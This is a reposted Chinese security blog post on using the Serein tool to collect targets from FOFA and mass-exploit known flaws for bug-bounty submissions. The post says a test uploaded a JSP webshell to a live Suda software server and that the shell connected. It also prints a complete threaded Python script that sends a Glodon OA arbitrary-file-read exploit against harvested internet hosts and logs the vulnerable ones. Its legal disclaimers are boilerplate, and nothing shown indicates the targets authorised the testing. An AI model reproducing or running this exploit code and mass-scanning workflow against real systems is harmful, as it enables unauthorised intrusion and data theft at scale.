文章总结: 本文介绍Serein工具的安装使用流程,这是一款图形化批量采集URL并进行NDAY检测的工具,适用于SRC挖掘和CNVD挖掘。详细说明了FOFA配置、漏洞利用模块调用方法,并以速达软件文件上传漏洞为例演示检测流程。同时指导如何自定义POC脚本扩展检测能力,通过广联达OA系统任意文件读取漏洞案例展示批量扫描和结果筛选过程。 综合评分: 78 文章分类: 安全工具,SRC活动,WEB安全,漏洞分析,实战经验
利用工具批量挖掘SRC
zkaq – yusi zkaq – yusi
掌控安全EDU
2026年6月29日 12:08 江西
在小说阅读器读本章
去阅读
扫码领资料
获网安教程
本文由掌控安全学院 – yusi 投稿
来Track安全社区投稿~
千元稿费!还有保底奖励~(https://bbs.zkaq.cn)
Serein 安装使用
工具地址:https://github.com/W01fh4cker/Serein
一款图形化、批量采集url、批量对采集的url进行各种nday检测的工具。可用于 src挖掘、cnvd挖掘、0day利用、打造自己的武器库等场景。其实能够利用 1day 打站的工具有很多,可以自定义的武器库工具也有很多,该工具主要是引用了反查域名和查权重的 api 功能,实现了一步到位。
github 下载后, pip 下载好依赖就能直接使用,工具排版,
先在 fofa 配置填上自己的 key,这个 fofa 的 api 功能是需要会员的,可以在某鱼某宝上购买便宜的,购买后的在下面替换自己的 api,当然也可以用其他的测绘工具。
利用流程也很简单,先利用 fofa 进行指定的 url 搜集,然后利用 nday 模块进行测试,最好反查域名查权重进行筛选。
这里拿 速达软件全系产品 DesignReportSave 任意文件上传漏洞 来进行测试,fofa 语法: app=”速达软件-公司产品”
可以看到搜集到的 ip 自动加了 http:// 和 https:// 协议,可以直接利用。点击 nday 利用模块选择对应漏洞(这个利用poc 是自己添加的,后面再讲如何添加 poc),
在大量的网站中总还是有些没有修复漏洞的,存在漏洞的站点会自动保存到 txt 文件中,这里随便选一个看是否成功。
看到成功连接到了上传的 jsp 木马,就点到为止了。然后进行 ip 反查域名
最后再进行一波权重查询进行筛选,有的交补天没有的就交漏洞盒子。
原 poc 地址:https://github.com/MzzdToT/HAC_Bored_Writing/tree/main/Fileupload/suda
SRC 批量挖掘
如果是平时挖 src 的话光靠这种 nday 是不行的,不是 0day 最起码也得是个 1day 吧,批量漏洞扫描挖 src 拼的就是一个手速。所以这里就需要去自己寻找新出的漏洞或者 cve 什么的,然后自己构建脚本进行批量扫描,再利用该工具自带的功能进行筛选。
在那些wiki漏洞文库上寻找比较新的漏洞即可,比如下面随便选一个看起来比较简单的
查看 poc 就是访问路由进行传参
仿造工具里面的 poc 改一下
import requests
import tkinter as tk
from tkinter import scrolledtext
from concurrent.futures import ThreadPoolExecutor
from ttkbootstrap.constants import *
import json
def yync_exp(url):
url1 = url + "/m/mobileAction.ashx/do.asmx?controller=Microsoft.VisualBasic.FileIO.FileSystem%2c%20Microsoft.VisualBasic%2c%20Version%3d8.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db03f5f7f11d50a3a&action=ReadAllBytes"
head= {
'Content-Type': 'application/json',
}
data = '["C:\\Windows\\win.ini"]'
try:
res = requests.post(url1, json=data, headers=head,timeout=3)
if "59" in res.text :
yync_rce_text.insert(END,"【*】存在漏洞的url:" + url + "\n")
yync_rce_text.see(END)
with open ("存在广联达OA系统任意文件读取url.txt", 'a') as f:
f.write(url + "\n")
else:
yync_rce_text.insert(END, "【×】不存在漏洞的url:" + url + "\n")
yync_rce_text.see(END)
except Exception as err:
yync_rce_text.insert(END, "【×】目标请求失败,报错内容:" + str(err) + "\n")
yync_rce_text.see(END)
def get_yync_addr():
with open("修正后的url.txt","r") as f:
for address in f.readlines():
address = address.strip()
yield address
def fileread_gui():
yync_rce = tk.Tk()
yync_rce.geometry("910x450")
yync_rce.title("广联达OA系统任意文件读取")
yync_rce.resizable(0, 0)
yync_rce.iconbitmap('logo.ico')
global yync_rce_text
yync_rce_text = scrolledtext.ScrolledText(yync_rce,width=123, height=25)
yync_rce_text.grid(row=0, column=0, padx=10, pady=10)
yync_rce_text.see(END)
addrs = get_yync_addr()
max_thread_num = 30
executor = ThreadPoolExecutor(max_workers=max_thread_num)
for addr in addrs:
future = executor.submit(yync_exp, addr)
yync_rce.mainloop()
然后再 gui 界面进行引用,
再次打开工具就可以看到多了个利用模块了,
同理搜集 url 进行批量扫描,然后漏洞 url 会写入 txt 文件中,
还是简单验证一下,解码就是内容。
然后就是查域名查权重了,不过这个漏洞资产比较少,基本都没有权重,有域名有公司的就全部甩漏洞盒子了。在选择漏洞的时候就选资产多的比较新的就行了。
漏洞库链接: wiki漏洞文库
申明:本公众号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,
所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法.
没看够~?欢迎关注!
分享本文到朋友圈,可以凭截图找老师领取
上千教程+工具+交流群+靶场账号哦
分享后扫码加我!
回顾往期内容
零基础学黑客,该怎么学?
网络安全人员必考的几本证书!
文库|内网神器cs4.0使用说明书
记某地级市护网的攻防演练行动
手把手教你CNVD漏洞挖掘 + 资产收集
【精选】SRC快速入门+上分小秘籍+实战指南
代理池工具撰写 | 只有无尽的跳转,没有封禁的IP!
点赞+在看支持一下吧~感谢看官老爷~
你的点赞是我更新的动力
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:掌控安全EDU zkaq – yusi zkaq – yusi《利用工具批量挖掘SRC》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论